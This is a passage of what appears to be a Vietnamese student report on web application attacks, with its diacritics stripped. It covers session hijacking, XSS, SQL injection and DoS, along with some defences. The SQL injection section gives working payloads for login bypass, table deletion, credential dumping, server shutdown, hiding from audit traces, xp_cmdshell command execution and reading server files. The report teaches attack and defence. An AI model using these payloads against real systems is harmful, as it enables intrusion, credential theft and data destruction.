- Cc cookie ca Netscape (NS) t trong mt tp tin Cookies.txt, vi ng dnCc

cookie ca Netscape (NS) t trong mt tp tin Cookies.txt, vi ng dn

SV :Nguyn Vn i 22


23/55


l: C:\Program Files\Netscape\Users\UserName\Cookies.tx

-Cc cookies ca IE c lu thnh nhiu tp tin, mi tp tin l mt cookie v

c t trong [C:]\Documents and Setting\[username]\Cookies (Win2000), i

vi win9x, th mc cookies nm trong th mc [C:]\Windows\cookies.

-Kch thc ti a ca cookie l 4kb. S cookie ti a cho mt tn min l 20 cookie.

Cookie b hy ngay khi ng trnh duyt gi l session cookie .

Bn cn bit v ci t cookie v cookie c th cho php cc trang web theo di

iu hng ca bn khi bn truy cp vo cc trang web .

2.1.3.5 PROXY

Proxy cung cp cho ngi s dng truy xut Internet nhng nghi thc t bit

hoc mt tp nhng nghi thc thc thi trn dual_homed host hoc basion host. Nhng

chng trnh client ca ngi s dng s qua trung gian proxy server thay th cho

server tht s m ngi s dng cn giao tip.

Proxy server xc nh nhng yu cu t client v quyt nh p ng hay khng

p ng, nu yu cu c p ng, proxy server s kt ni vi server tht thay cho

client v tip tc chuyn tip nhng yu cu t client n server, cng nh tr lica

server n client. V vy proxy server ging cu ni trung gian gia server v client.

SV :Nguyn Vn i 23


24/55


CHNG 3:CC K THUT TN CNG NG WEB

C BN

A. L thuyt

1. KIM SOT TRUY CP WEB (Web Access Control)

Thm nhp h thng qua ca sau (Back door)

Trong qu trnh thit k ng dng, nhng ngi pht trin ng dng c th ci

mt ca sau (back door) sau ny c th thm nhp vo h thng mt cch d

dng.

2. CHIM HU PHIN LM VIC(Session Mangement)

1.1 n nh phin lm vic (Session Fixation)

L k thut tn cng cho php hacker mo danh ngi dng hp l bng cch

gi mt session ID hp l n ngi dng, sau khi ngi dng ng nhp vo h

thng thnh cng, hacker s dng li session ID v nghim nhin tr thnh

ngi dng hp l.

2.2 nh cp phin lm vic (Session Hijacking)

L k thut tn cng cho php hacker modanh ngi dng hp l sau khi nn

nhn ng nhp vo h thng bng cch gii m session ID ca h c lu

tr trong cookie hay tham s URL, bin n ca form.

3 LI DNG THIU ST TRONG VIC KIM TRA DLIU HP L (INPUT VALIDATION)

Hacker lidng nhng nhp d liu gi i mt on m bt k khin cho h

thng phi thc thi on lnh hay b ph v hon ton.

3.1 Kim tra tnh ng n ca d liu bng ngn ng pha trnh duyt

SV :Nguyn Vn i 24


25/55


(Client-Side validation)

Do ngn ng pha trnh duyt ( JavaScript, VBScript..) uc thc thi trn trnh

duyt nn hacker c th sa i m ngun c th v hiu ha s kim tra.

3.2 Trn b m (Buffer OverFlow)

Mt khi lng d liu c gi cho ng dng vt qu lng d liu c cp

pht khin cho ng dng khng thc thi c cu lnh d nh k tip m thay vo

phi thc thi mt on m bt k do hacker a vo h thng. Nghim trng hn nu

ng dng c cu hnh thc thi vi quyn root trn h thng.

3.3 M ho URL (URL Encoding)

Li dng chun m ha nhng k tc bit trn URL m hacker s m ho tng nhng k t bt hp l-nhng k t b kim tra bng ngn ng kch bn- vt

qua vng kim sot ny.

3.4 K t Meta (Meta-characters S dng nhng k t c bitHacker c th chnthm vo d liu gi nhng k t trong chui cu lnh nh

trong k thut XSS, -- trong SQL. thc thi cu lnh.

3.5 Vt qua ng dn (Path Traversal):

L phng php li dng ng dn truy xut mt tp tin trn URL tr kt

qu v cho trnh duyt m hacker c th ly c ni dung tp tin bt k trn h thng.

3.6 Chn m lnh thc thi trn trnh duyt nn nhn

(Cross- Site Scripting):

y l k thut tn cng ch yu nhm vo thng tin trn my tnh ca ngi

dng hn l vo h thng my ch. Bng cch thm mt on m bt k ( thng c

lp trnh bng ngn ng kch bn nh JavaScript, VBScript), hacker c th thc hin

vic nh cp thng tin quan trng nh cookie t tr thnh ngi dng hp l

ca ng dngda trn nhng thng tin nh cp ny. Cross- Site scripting cng l

mt kiu tn cng session hijacking.

3.7 Thm cu lnh h thng (OS Command Injection)

SV :Nguyn Vn i 25


26/55


Kh nng thc thi c nhng cu lnh h thng hay nhng on m c thm

vo trong nhng tham s m khng c s kim tra cht ch nh tham s ca form,

cookies, yu cu HTTP Header, v nhng d liu nguy him trong nhng tp tin c

a ln trnh ch. Thnh cng trong k thut ny gip hacker c th thc thi cnhng cu lnh h thng vi cng quyn ca trnh ch.

3.8 K t rng (Null Characters)

Li dng chui k t thng kt thc bng \0 m hacker thng thm vo

nh la ng dng v vi nhng ng dng s dng chng trnh dch nh C++ th C++

cho rng \0 l du kt thc chui. V d:

Hacker thm chui sau: nhp: ti th nht\0 alert(document.cookie)

Nu ng dng s dng chng trnh C++ kim tra tnh ng n ca chui

th chui trn hp l do C++ s nhn bit \0 l kt thc chui nn khng kim tra.

3.9 Chn cu truy vn SQL (SQL Injection)

Trong lp trnh vi c s d liu, ngi lp trnh sai st trong vn kim tra

gi tr nhp vo t hacker li dng thm vo nhng cu truy vn hay nhng gitr khng hp l d dng ng nhp vo h thng.

3.10 Ngn ng pha my ch (Server side includes)

L kh nng thm vo nhng cu lnh thuc h thng nh nhng file (include

file), truy xut c s d liu (jdbc)khin cho hacker c c hi truy xut n file, c

s d lium bnh thng khng th xem c trn Web site.

3.11 Thao tc trn tham s truyn (Parameter manipulation)

Nhng thng tin trao i gia trnh ch v trnh duyt c lu tr trong nhng

bin nh bin trn URL, bin n form, cookieBi v vic kim sot bin chac

quan tm ng mc nn hacker c th li dng sa i gi tr bin nh cp phin

lm vic ca ngi dng hay thay i gi tr mt mn hng.

SV :Nguyn Vn i 26


27/55


3.12 T chi dch v (Denial of service (DoS))

Mt khi lng ln yu cu c gi cho ng dng trong mt khong thi gian

nht nh khin h thng khng p ng kp yu cu dn n h thng b ph v.

B, Cc cch trin khai tn cng ng dng webPhn trc trong n trnh by s lc v cc cch tn cng ng dng web

c bn. Phn ny s ni c th hn mt s cch tn cn bn v ph bin

1. Thao tc trn tham s

Thao tc trn tham s truyn l k thut thay i thng tin quan trng trn

cookie, URLhay bin n ca form. K thut Cross-Site Scripting, SessionID, SQL

Injection, BufferOverflowcng cn dng n cc tham s ny hon thin cc

bc tn cng cahacker. C th ni cc tham s truyn l u mi cho mi hot ng

ca hacker trong qu trnh tn cng ng dng. V th y l ni dung chng u tin

c cp trong phn ny , mc ch cng l h tr tt hn phn trnh by cc

phn k tip.

1.1 THAO TC TRN URL

1.1.1 Khi nimKhi nhp mt form HTML th kt qu s c gi i theo hai cch: GET hay

POST. Nu dng GET, th tt c cc tn bin v gi tr ca n s xut hin trong chui

URL.

1.1.2 Cch khc phc

chng li kiu thay i ni dung mt chui URL, ng dng c th p dng

bin php sau:

` ng dng s dng c ch bng bm (hash table). Sau khi ngi dng chng

thc thnh cng vi mt username , ng dng s sinh ra mt kho tng ng. Kho

ny s c lu trn server cng vi bin username trong i tng bng bm. Mi khi

ngi dng kt ni n ng dng, kho v username ny s c gi i v c so

SV :Nguyn Vn i 27


28/55


snh vi kho v username trong bng bm. Nu tng ng vi bn ghi trong d liu

th hp l. Cn nu khng th server bit rng ngi dng thay i URL.

Ngoi ra, vi nhng thng tin c gi tr, cn m ho thng tin ny trc khi

cho hin th trn trnh duyt trnh hacker c th sa i ty .

1.2. THAO TC TRN BIN N FORM

1.2.1 Khi nim

Thng tin c th c chuyn i thng qua mt bin n ca form, gi l

Hidden Form Field. Bin n form khng hin th trn mn hnh trnh duyt nhng

ngi dng c th tm thy ni dung ca n trong view source , v th y l mt

im yu hacker li dng bng cch lu ni dung trang web xung trnh duyt, thayi ni dung trang v gi n trnh ch.

Ngoi vic thay i ni dung bin n ca form, hacker cn bin i ni dung

cc thnh phn trong form, nh chiu di ca mt nhp d liu thc hin vic tn

cng BUFFER OVERFLOW,

1.2.2. Mt s bin php khc phc

Ch nn s dng bin n ca form hin th d liu trn trnh duyt, khng

c s dng gi tr ca bin thao tc trong x l ng dng.

Dng bin HTTP_REFERER kim tra ngun gc ca yu cu gi n, tuy

nhin hacker c th s dng Proxy che du ngun gc thc ca n, v vy cng

khng nn qu tin tng bin HTTP_REFERER kim tra.

Ghp tn v gi tr ca bin n thnh mt chui n. S dng thut ton m

ho MD5 hoc mt kiu hash mt chiu khc tng hp chui v lu n vo mt

hidden field gi l Chui mu.

Khi gi tr trong form c gi i, cc thao tc nh trn c thc hin li vi

cng mt kho m ta nh trc. Sau em so snh viChui mu, nu chng

khng khp nhau th chng t gi tr trong biu mu b thay i.

SV :Nguyn Vn i 28


29/55


Dng mt sessionID tham chiu n thng tin c lu tr trn c s d

liu.

2 K thut tn cng SQL Injection

2.1 Di y l k thut SQL injection n gin nht

Mc ch dng vt qua cc form ng nhp.

V d 1: gi s ng dng web c on m sau:

SQLQuery= SELECT tkUsername FROM User WHERE tkUsername= &

strUsername & AND Password= & tkPassword &

flag= GetQueryResult (SQLQuery)

if flag = then

check=FALSE

else

check=TRUE

end if

on m trn kim tra chui nhp Username v Password. Nu tn ti trong bng

User th check=true ngc li check=false.

Gi tri nhp vo l:

Username: OR =

Password: OR =

Cu lnh SQL lc ny nhsau:

SELECT tkUsername FROM User WHERE tkUsername= OR = ANDPassword= OR =

Cu lnh so snh trn lun lun ng (v lun bng ). Do cu iu kin

trong mnh WHERE lun ng. Gi tr tn ngi s dng ca dng u tin

trong bng s c chn.

SV :Nguyn Vn i 29


30/55


Kt hp vi k t c bit ca SQL :

k t ; : nh du kt thc 1 cu truy vn

k t -- : n chui k t pha sau n trn cng 1 dng

V d 2:

Username: ; drop table User--

Password:

Cu lnh SQL lc ny nh sau:

SELECT tkUsername FROM User WHERE tkUsername= ;drop table

User-- AND Password= & tkPassword &

Vi cu lnh trn th bng User s b xa hon ton.

V d 3: Mt v d khc s dng k t c bit SQL thm nhp vo h thng nh

sau:

Username : admin--

Password :

Cu lnh SQL nh sau:

SELECT tkUsername FROM User WHERE tkUsername= admin-- AND

Password= & tkPassword &

Cu lnh trn cho php ng nhp vo h thng vi quyn admin m khng i hi

password.

2.2. Tn cng da vo cu lnh SELECT

SV :Nguyn Vn i 30


31/55


Ngoi k thut n gin trn, vic tn cng thng da trn nhng thng bo li ly

thng tin v bng cng nh nhng trng trong bng. lm c iu ny, cn phi

hiu nhng thng bo li v t chnh sa ni dung nhp cho ph hp.

Direct Injection l nhng i s c thm vo trong cu lnh m khng nmgia nhng du nhy n hay du ngoc kp l trng hp direct injection. v hiu

ho du nhy v thay i cu lnh m vn gi c c php ng, chui m chn thm

vo phi c mt du nhy n trc chui k t c chn vo v cui cu lnh phi

c mt du nhy n, chng hn nh sau:

StrSQL=SELECT tkUsername FROM User WHERE tkUsername= and =

Nu thc hin nh trn m thng bo li c lin quan n du(th trong chui

chn vo phi c ):

V d 4: Gi s:

StrSQL=SELECT tkUsername FROM User WHERE (tkUsername=& tName& )

Th c php hp l nh sau:

StrSQL=SELECT tkUsername FROM User WHERE (tkUsername=) or =

Ngoi ra k t % thng c dng trong nhng trng hp tm kim thng tin.

V d 5:StrSQL=SELECT tkUsername FROM User WHERE tkUsername like %

& tName &

2.3. Tn cng da vo cu lnh HAVING

HAVING s dng cng chung vi mnh GROUP BY l phng php hu hiu

nhn thng tin bng, trng v s c bn su hn trong phn 4.

2.4. Tn cng da vo cu lnh kt hp UNION

Lnh SELECT c dng ly thng tin t c s d liu. Thng thng v tr c th

c chn thm vo mt mnh SELECT l sau WHERE. c th tr v nhiu

dng thng tin trong bng, thay i iu kin trong mnh WHERE bng cch chn

thm UNION SELECT.

V d 6:

SV :Nguyn Vn i 31


32/55


StrSQL=SELECT tkUsername FROM User WHERE tkUsername like % &

tName & UNION SELECT tkPassword from User

Cu lnh trn tr v mt tp kt qu l s kt hp gia tkUsername vi tkPassword

trong bng User.

Ghi ch:

S ct trong hai cu SELECT phikhp vi nhau. Ngha l s lng ct trong

cu lnh SELECT ban u v cu lnh UNION SELECT pha sau bng

nhau v cng kiu. Nh vo li c php tr v sau khi chn thm cu lnh UNION m

c th bit kiu ca mi trng. Sau y l nhng v d c thc hin khi khng bit

ni dung c s d liu da vo HAVING, GROUP BY, UNION:V d 7: Nhc li cu truy vn cn ng nhp:

SQLQuery= SELECT tkUsername,tkPassword

FROM User

WHER tkUsername= & strUsername & AND Password= & tkPassword&

u tin, bit tn bng v tn trng m cu truy vn s dng, s dng cu

iu kin having , nh v d sau: Gi tr nhp vo:Username:having 1=1--

Li pht sinh: [Microsoft][ODBC SQL Server Driver][SQL Server]Column

'User.tkUsername'is invalid in the select list because it is not contained in an aggregate

function and there is no GROUP BY

clause.

Nh vo li pht sinh ny m bit c bng s dng trong cu truy vn l User vtrong bng tn ti mttrng tn l tkUsername.

Sau s dng GROUP BY:

V d 8

Username: group by User.tkUsername having 1=1--

SV :Nguyn Vn i 32


33/55


Li pht sinh:

[Microsoft][ODBC SQL Server Driver][SQL Server] Column 'User.tkPassword' is

invalid in the select list because it is not contained in either an aggregate function or

the GROUP BYclause.

Nh vy tkPassword l mttrng ca bng User v c s dng trong cu truy vn.

Tip tc dng GROUP BY cho n khi bit c tt c cc trng trong bng User

tham gia vo cu truy vn.

Khi khng cn bo li c php GROUP BY na th chuyn qua cng on kim tra

kiu ca tng trng trong bng. Lc ny UNION c s dng:V d 9:

Username:union select sum(tkUsername) from User

Lnh sum l lnh tnh tng cho i s bn trong du ngoc. i s phi l kiu s.

Nu i s khng l kiu s th pht sinh li nh sau:

[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate

operationcannot take a varchar data typeas an argument.Nh vy vi thng ip li nh trn th tkUsername chc chn phi l kiu varchar.

Vi phng php trn, d dng xc nh c kiu ca tng trng trong bng. Sau

khi nhn y trng tin trn th hacker d dng t thm thng tin vo

bng User.

V d 10

Username: ; insert into User(tkUsername,tkPassword) values(admin, )--

Hacker thm ni dung nh V d 6.III.4.2.4 by gi tr thnh ngi qun tr mng m

khng cnmt khu chng thc.

V d 11: minh ho mt cng on s gip hacker c ht thng tin trong bng User:

SV :Nguyn Vn i 33


34/55


Bc 1: To mt Stored procedure chp vo tt c thng tin ca 2 trng

tkUsername v tkPassword trong bng User thnh mt chui vo mt bng mi l foo

c mt trng l ret bng on m sau:

create proc testas

begin

declare @ret varchar(8000)

set @ret=':'

select @ret=@ret+' '+tkUsername+'/'+tkPassword from User

select @ret as ret into foo

end

Thc thi cu lnh bng cch nhp vo form.

Username:; Create proc test as begin declare @ret

varchar(8000) set @ret=: select @ret=@ret+'

'+tkUsername+'/'+tkPassword from User select @ret as ret into

foo

Bc 2: Gi Stored procedure

Sau khi to c stored procedure nh trn, thc hin li gi hm:

Username: ;exec test

Bc 3: Dng UNION xem ni dung bng foo

Username:; select ret,1 from foo union select 1,1 from foo

Li pht sinh:

Microsoft OLE DB Provider for ODBC Drivers error

'80040e07'[Microsoft][ODBC SQL Server Driver][SQL

Server]Syntax error convertingthe varchar value ':

SV :Nguyn Vn i 34


35/55


admin/passofAdmin nhimmap/passofnhimmap minhthu/passofminhthu'

To a column of data type int.

Qua mt s cng on, hacker thu c ni dung ca bng User gm c tn:

tkUsername v mt khu tkPassword.

Bc 4: Ngoi ra hacker cn c th cn thn xo bng foo xo du vt:

Username:; drop table foo--

V d 12: Cn y l mt cch khc xc nh ni dung ca bng User, cn mt

phng php tm kim thng tin nh sau:

Bc 1: Tm tun t tng dng trn bng User

Username:union select 1,1

hoc :

Username: union select min(tkUsername),1 from User where

tkUsername> a--

Li pht sinh:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error

converting the varchar value ' admin ' to a column of data type int.

Ngi u tin trong bng User l admin.

Bc 2: bit cc gi tr tip theo, nhp chui sau:

Username:;select min(tkUsername),1 from User where

tkUsername> adminunion select 1,1 from User

Li pht sinh:


[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax

Error Converting the varchar value 'nhimmap' to a column of data type int.

SV :Nguyn Vn i 35


36/55


Bc 3: Thc hin nh bc 2 cho ra kt qu l tng dng vi trng

tkUsername trong bng User.

Bc 4: bit thm v tkPasswork, c th thc hin nh sau:

Username: ;select tkPassword,1 from User where tkUsername=admin

union select 1,1 from User

Li pht sinh:


[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error

Converting the varchar value ' passOfAdmin ' to a column of data type int.

bit thng tin v cc bng, ct trong c s d liu, c th truy vn bng n bng h

thng INFORMATION_SCHEMA.TABLES.

V d 13:

select TABLE_NAME from INFORMATION_SCHEMA.TABLES

INFORMATION_SCHEMA.TABLES cha thng tin v tt c cc table c trn server.

Trng TABLE_NAME cha tn ca mi table trong c s d liu.

SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNSWHERE

TABLE_NAME='User'

Cu lnh trn cs dng bit thng tin v ct trong bng. Ngoi ra cn c th

dng UNION bitcc bin mi trng ca SQL Server.

V d 14: bit ng dng ang chy trn Server no, c th xc nh bng

cch sau:Username: ;select @@SERVERNAME union select 1

Li pht sinh:

Microsoft OLE DB Provider for ODBC Drivers error

'80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax

SV :Nguyn Vn i 36


37/55


error converting the varchar value ' KHOAI_NGU ' to a column of

data type int.

2.5. Tn cng da vo lnh INSERT

T kho INSERT dng a thng tin vo c s d liu. Thng thng cu

lnh INSERT c dng trong cc trng hp nh: thng tin ng k ngi s dng,

guestbookv..v

K thut ;, -- c dng nh tng dng vi cu lnh SELECT, phi m

bo ng s lng v kiu gi tr c nhp vo nhm trnh li v c php (nu khng

xc nh c kiu d liu c th nhp tt c l s).

V d 15:SQLString= INSERT INTO User VALUES ( & strUsername & , &

strName& , & strPassWord & ,& strLimitSize & )

2.6 Tn cng da vo STORED PROCEDURE

Stored Procedure c s dng trong lp trnh Web vi mc ch gim s phc tp

trong ng dng v trnh s tn cng trong k thut SQL Injection. Tuy nhin hacker

vn c th li dng nhng Stored Procedure tn cng vo h thng.V d 16: Stored procedure sp_login gm hai tham s l username v password. Nu

nhp:

Username: nhimmap

Password: ;shutdown--

Lnh gi stored procedure nh sau:

exec sp_login nhimmap,;shutdown--Lnh shutdown thc hin dng SQL Server ngay lp tc.

2.7. Mt s k thut tn cng b xung

2.7.1 Chui k t khng c du nhy n

SV :Nguyn Vn i 37


38/55


Nhng nh lp trnh c th bo v ng dng ca h bng cch loi b tt c du

nhy, thng thng loi b du nhy bng cch thay mt du nhy thnh 2 du nhy.

V d 17

Function escape (input)

Input=replace(input, , )

escape=input

end function

R rng l, n ngn chn c tt c nhng kiu tn cng trn. Tuy nhin nu mun

to ra mt chui gi tr m khng dng cc du nhy, c th dng hm char() nh v

d sau: V d 18:INSERT into User VALUES(666, char(0x63) +char(0x68)

+char(0x72) char(0x69) +char(0x73) ,char(0x63) +char(0x68)

+char(0x72) +char(0x69) +char(0x73),0xffff)

V d 19 trn tuy l mt cu truy vn khng c du nhy n no nhng n vn c th

insert chui vo bng, v tng ng vi:

INSERT into User VALUES( 666,chris,chris,255)Hacker cng c th chn username , password l strnh du nhy nh v d sau: V

d 20

INSERT into User VALUES( 667,123,123,0xffff)

SQL server s t ng chuyn t s sang chui.

2.7.2 Tn cng 2 tng

Mc d ng dng thay th du nhy n nhng vn cn kh nng b chn on mSQL .

V d 21: ng k account trong ng dng, nhp username nh sau:

Username : admin'

Password: passofadmin

SV :Nguyn Vn i 38


39/55


ng dng s thay th du nhy, kt qu trong cu insert s nh sau:

INSERT into User VALUES(123, 'admin''--', 'password',0xffff)

(nhng trong c s d liu s lu l admin-- )

Gi s rng ng dng cho php ngi dng thay i mt khu. Cc on m ASP c

thit k m bo rng ngi s dng phi nhp ng mt khu c trc khi nhp mt

khu mi. on m nh sau:

username = escape( Request.form("username") );

oldpassword = escape( Request.form("oldpassword") );

newpassword = escape( Request.form("newpassword") );

var rso = Server.CreateObject("ADODB.Recordset");

var sql = "select * from users where username = '" + username

+ "' and password = '" + oldpassword + "'";

rso.open( sql, cn );

if (rso.EOF)

{

Cu truy vn thit lp mt khu mi nh sau:

sql = "update users set password = '" + newpassword +

"' where username= '" + rso("username") + "'"

rso(username) chnh l gi tr username c c cu truy vn login v n l admin--

Cu truy vn lc ny nh saupdate users set password = 'password' where username =

'admin'--'

Nh hacker c th thay i mt khu ca admin bng gi tr ca mnh. y l

1 trng hp cn tn ti trong hu ht nhng ng dng ln ngy nay c s dng c ch

loi b d liu. Gii php tt nht l loi b nhng gi tr li hn l chnh sa li.

Nhng c mt vn l c mt s nhp d liu (nh nhp tn) cho php nhng k

SV :Nguyn Vn i 39


40/55


t ny. V d: OBrien. Cch tt nht gii quyt vn ny l khng cho php nhp

du nhy n. Nu iu ny khng th thchin c , th loi b v thay th nh trn.

Trong trng hp ny, cch tt nht l m bo tt c d liu c a vo cu

truy vn SQL (k c nhng gi tr trong c s d liu) phi c kim sot mt cchcht ch.

Mt s ng dng phng chng vic thm cu truy vn t ngi dng bng cch

gii hn chiu di ca nhp. Tuy nhin, vi gii hn ny th mt s kiu tn cng

khng th thc hin c nhng vn c ch h hacker li dng.

V d 22: Gi s c username v password u b giihn ti a l 16 k t.Nhp:

Username: aaaaaaaaaaaaaaa

Password : ; shutdown--

ng dng s thay th mt du nhy n bng hai du nhy n nhng do chiu di

chui b gii hn ch l 16 k t nn du nhy n va c thm sb xo mt. Cu

lnh SQL nh sau:

Select * from users where username=aaaaaaaaaaaaaaa and

password=; shutdown

kt qu l username trong cu lnh c gi tr l:

aaaaaaaaaaaaaaa and password=

2.7.3 Trnh s kim sot:

SQL server c mt giao thc kim sot cht ch bng h hm sp_traceXXX, cho php

ghi nhn nhiu s kin xy ra trong c s d liu. c bit l cc s kin T-SQL, ghi

nhn li tt c cc cu lnh SQL thc hin trn Server. Nu ch kim sot c bt

th tt c cc cu truy vn SQL ca hacker cng b ghi nhn v nh m mt ngi

qun tr c th kim sot nhng g ang xy ra v nhanh chng tm ra c gii php.

Nhng cng c mt cch chng li iu ny, bng cch thm dng sp_password

vo cu lnh T-SQL, v khi gp chui ny th vic kim tra s ghi nhnnh sau:

-- sp_password was found in the text of this event.

SV :Nguyn Vn i 40


41/55


-- The text has benn replaced with this comment for security reasons.

ngay c khi sp_password xut hin trong phn ch thch. V th du tt c cu

truy vn tn cng, ch cn n ginl thm:

sp_password vo sau -- nh sau:

Username: admin--sp_password

2.7.4 Dng Extended Stored Procedure c sn trong h thng

SQL Server

Nu ci SQL Server ch mc nh th SQL Server chy trn nn

SYSTEM, tng ng mc truy cp Windows. C th dng

master..xp_cmdshell thi hnh lnh t xa: ; exec master..xp_cmdshell 'ping

10.10.1.2'--

Th dng du nhy i (") nu du nhy n (') khng lm vic.

Di y l mt s extended stored procedure m hacker thng hay s

dng thc thi nhng cu lnh xem ni dung thng tin trong my nn

nhn:

Xp_availablemedia hin th nhng a hin hnh trn my

Xp_dirtree hin th tt c cc th mc k c th mc con

Xp_loginconfig Ly thng tin v ch bo mt trn server

Xp_makecab cho php ngi s dng to cc tp tin lu tr trn

Server (hay bt c tp tin no m server c th truy x

2.7.5. Dng Extended Stored Procedure t to

Extended stored procedure API l mt chng trnh c mt nhim v n

gin l to ra mt DLL extended stored porcedure cha ng on m nguy him.

a tp tin DLL ln Server c th dng cc cu lnh, hoc cc k thut giao tip khc

nhau c thc hin t ng, nh l HTTP download v FTP script.

SV :Nguyn Vn i 41


42/55


Mt khi tp tin DLL tn ti trn my ch, th hacker c th to mt extended stored

procedure bng dng lnh sau :

V d 19:

sp_addextendedproc xp_webserver, c:\temp\xp_foo.dll

Sau c th thc thi n nh l thc thi extended stored procedure thng

thng :

exec xp_webserver

Khi thc hin xong, c th xo bng lnh sau:

sp_dropextendedproc xp_webserver

Xp_ntsec_enumdomainlit k nhng domain m server c th truy vn.

Xp_terminate_process chm dt mt tin trnh vi tham s PID ca n.

2.7.6 Nhp tp tin vn bn vo bng

Dng lnh bulk insert, nhp d liu t mt tp tin vn bn vo trong mt bng tm

thi.

V d 24 to mt bng n gin nh sau:

create table foo (line varchar(8000))

Sau chy cu lnh bulk insert chp d liu t tp tin vo bng

V d 25:

bulk insert foo from c:\inetpub\wwwroot\process_login.asp

Ni dung trang process_login.asp c th ly v bng cch dng nhng k thut nh

trong V d 18.

2.7.7 CCH PHNG CHNG

Trong hu ht trnh duyt, nhng k t nn c m ho trn a ch URL

trc khi c s dng.

Vic tn cng theo SQL Injection da vo nhng cu thng bo li do vic

phng chng hay nht vn l khng cho hin th nhng thng ip li cho ngi dng

SV :Nguyn Vn i 42


43/55


bng cch thay th nhng li thng bo bng 1 trang do ngi pht trin thit k mi

khi li xy ra trn ng dng.

Kim tra k gi tr nhp vo ca ngi dng, thay th nhng k t nh ; v..v..

Hy loi b cc k t meta nh ' , " , / , \ , ; v cc k t extend nh NULL,CR, LF, ...

trong cc string nhn c t:

- d liu nhp do ngi dng trnh

- cc tham s t URL

- cc gi tr t cookie

i vi cc gi tr numeric, hy chuyn n sang integer trc khi thc hincu truy vnSQL, hoc dng ISNUMERIC chc chn n l mt s integer.

Dng thut ton m ho d liu

3 K thut tn cng gy trn b m v t chi dch

v(Buffer overflow)

K thut ny ch yu khai thc vic ngi dng m vt qu lng b nh cp

pht ban u bi ng dng do gy choh thng lm vo tnh trng trn b nh, thmch c th b chn thm mt on m bt k. Nu ng dng c cu hnh c thcthi nh root th ngi tn cng c th thao tc nh mt nh qun tr h thng ca webserver.

y l mt cch tn cng c coi l kinh in . y trong n ny ti s

trnh by mt k thut tn cng gy trn b m v t chi dch v l Dos.

3.1 Khi nim

Tn cng kiu DoS l kiu tn cng lm cho cc dch v mng b t lit, khngcn kh nng p ng c yu cu na. Loi tn cng ny nh hng n nhiu hthng, rt d thc hin v li rt kh bo v h thng khi kiu tn cng DoS. Thngthng, kiu tn cng DoS da trn nhng giao thc (protocol). V d vi

SV :Nguyn Vn i 43


44/55


giao thc l ICMP, hacker c th s dng bomb e-mail gi hng ngn thng ipemail vi mc ch tiu th bng thng lm hao ht ti nguyn h thng trn mailserver. Hoc c th dng phn mm gi hng lot yu cu n my ch khin chomy ch khng thp ng nhng yu cu chnh ng khc.

3.2 Cc i tng b nh hng bi kiu tn cng ny

TN CNG TRN SWAP SPACEHu ht cc h thng u c vi trm MB khng gian chuyn i ( swap space)

phc v cho nhng yu cu t my khch. Swap space thung dng cho cc tintrnh con c thi gian ngn nn DoS c th c da trn phng thc lm trn yswap space.

TN CNG TRN BANDWIDTH:Phn bng thng dnh cho mi h thng l gii hn, v th nu hacker cng lc

gi nhiu yu cu n h thng th phn bng thng khng p ng cho mt khi

lng d liu ln v dn n h thng b ph v. TN CNG VO RAM:Tn cng Dos chim 1 khong ln ca RAM cng c th gy ra cc vn ph

hy h thng. Kiu tn cng BufferOverflow l mt v d cho cch ph hy ny TN CNG VO DISKS:Mt kiu tn cng c in l lm y a cng. a cng c th b trn v khng

th c s dng na.

3.3 Cc kiu tn cng DDos3.3.1 Kiu tn cng th 1Hacker hon ton c kh nng lm ngp h thng v bng thng ca hacker ln

hn bng thng ca my ch. Kiu tn cng ny khng b hn ch bi tc truyn mng.v d: Hacker c mt ng truyn tc cao T1 ( 1.544- Mbps ) hayln hn c th d dng ph v mt h thng c ng truyn 56Kbps.

3.3.2. Kiu tn cng th 2Kiu tn cng ny c s dng khi ng truyn mng ca hacker l qu thp

so vi ng truyn ca my ch.Khng ging nh kiu tn cng DoS truyn thng ( phn 2 ), kiu tn cng vo

bng thng ln hn s li dng nhng gi tin t nhng h thng khc nhau cng mtlc tin n h thng ch khin cho ng truyn ca h thng ch khng cn kh

nng p ng, my ch khng cn kh nng nhn mt gi tin no na. Kiu tn cngny s loi my ch ra khi Internet.

y l phng php tn cng kiu t chi dch v nhng khng l DoS m gil DDoS ( kiu t chi dch v phn tn ), ngha l cng mt lc nhiu my sc

pht ng gi gi tin n my ch, lm cho my ch khng cn kh nng tipnhn gi tin v b loi khi mng Internet.

Bng cch gi a ch IP ca my ch, hacker s cng lc gi nhiu gi tin

SV :Nguyn Vn i 44


45/55


n cc h thng my mnh trn mng, cc h thng ny khi nhn gi tin SYN gi ny,chp nhn kt ni v gi tr mt gi tin SYN/ACK thng bo. V a ch IP ca gitin SYN b hacker sa i thnh a ch IP my ch nn nhng gi tin SYN/ACK sc gi v cho my ch. Cng mt lc nhn c nhiu gi tin, ng truyn camy ch khng kh nng p ng, h thng my ch t chi nhn bt k gi tin

no v lc ny h thng my ch b sp .

3.3.3. Kiu tn cng vo ti nguyn h thngy l kiu tn cng nhm vo ti nguyn h thng hn l ti nguyn mng nh

CPU, b nh, file h thng, tin trnh..Hacker l mt ngi dng hp l ca hthng, v c mt lng ti nguyn gii hn trn h thng. Tuy nhin, hacker s lmdng quyn truy cp ny yu cu thm ti nguyn. Nh vy, h thng hay nhngngi dng hp l s b t chi s dng ti nguyn chia s.

Kiu tn cng s khin cho h thng khng th s dng c v ti nguyn bs dng ht, khng cn tin trnh thc thi na

3.4 Cch phng chng

Kiutn cng t chi dch v tuy ch khin cho h thng b ph v trong vipht nhng hu qu th kh to ln (nh hng trn phm vi tin v uy tn). y l kthut thng c hacker s dng trong trng hp khng th chim quyn qun trtrn h thng hoc thng tin, hoc mun ph hy uy tn ca c quan .Thm vovic gi mo a ch khin cho hacker cng d dng thc hin vic tn cng mkhng s b pht hin.

